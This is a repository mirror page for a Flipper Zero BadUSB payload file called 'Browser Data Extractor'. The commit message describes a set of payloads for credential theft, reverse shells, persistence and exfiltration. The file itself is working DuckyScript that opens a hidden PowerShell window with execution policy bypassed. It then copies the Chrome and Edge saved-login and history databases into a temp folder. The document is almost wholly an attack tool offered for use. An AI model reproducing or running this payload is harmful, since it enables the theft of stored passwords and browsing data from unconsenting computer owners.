mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2026-09-17 07:13:18 +00:00
4f61dec96b
Added 25 BadUSB payloads for Flipper Zero: - System reconnaissance (Windows/Linux/Mac) - Credential extraction & WiFi password stealing - Reverse shells (PowerShell & Bash) - Defense evasion & persistence - Data exfiltration (keylogger, webcam, clipboard) - Harmless pranks All payloads include proper headers and documentation. Cross-platform support for Windows, Linux, and macOS.
28 lines
899 B
Plaintext
28 lines
899 B
Plaintext
REM ========================================
|
|
REM NullSec Flipper Zero BadUSB
|
|
REM Payload: Browser Data Extractor
|
|
REM Target: Windows 10/11 (Chrome/Edge)
|
|
REM ========================================
|
|
DELAY 1000
|
|
GUI r
|
|
DELAY 500
|
|
STRING powershell -w hidden -ep bypass
|
|
ENTER
|
|
DELAY 1000
|
|
STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default"
|
|
ENTER
|
|
STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default"
|
|
ENTER
|
|
STRING $out = "$env:TEMP\browser_data"
|
|
ENTER
|
|
STRING New-Item -ItemType Directory -Force -Path $out | Out-Null
|
|
ENTER
|
|
STRING if(Test-Path "$chromePath\Login Data"){Copy-Item "$chromePath\Login Data" "$out\chrome_logins.db"}
|
|
ENTER
|
|
STRING if(Test-Path "$chromePath\History"){Copy-Item "$chromePath\History" "$out\chrome_history.db"}
|
|
ENTER
|
|
STRING if(Test-Path "$edgePath\Login Data"){Copy-Item "$edgePath\Login Data" "$out\edge_logins.db"}
|
|
ENTER
|
|
STRING exit
|
|
ENTER
|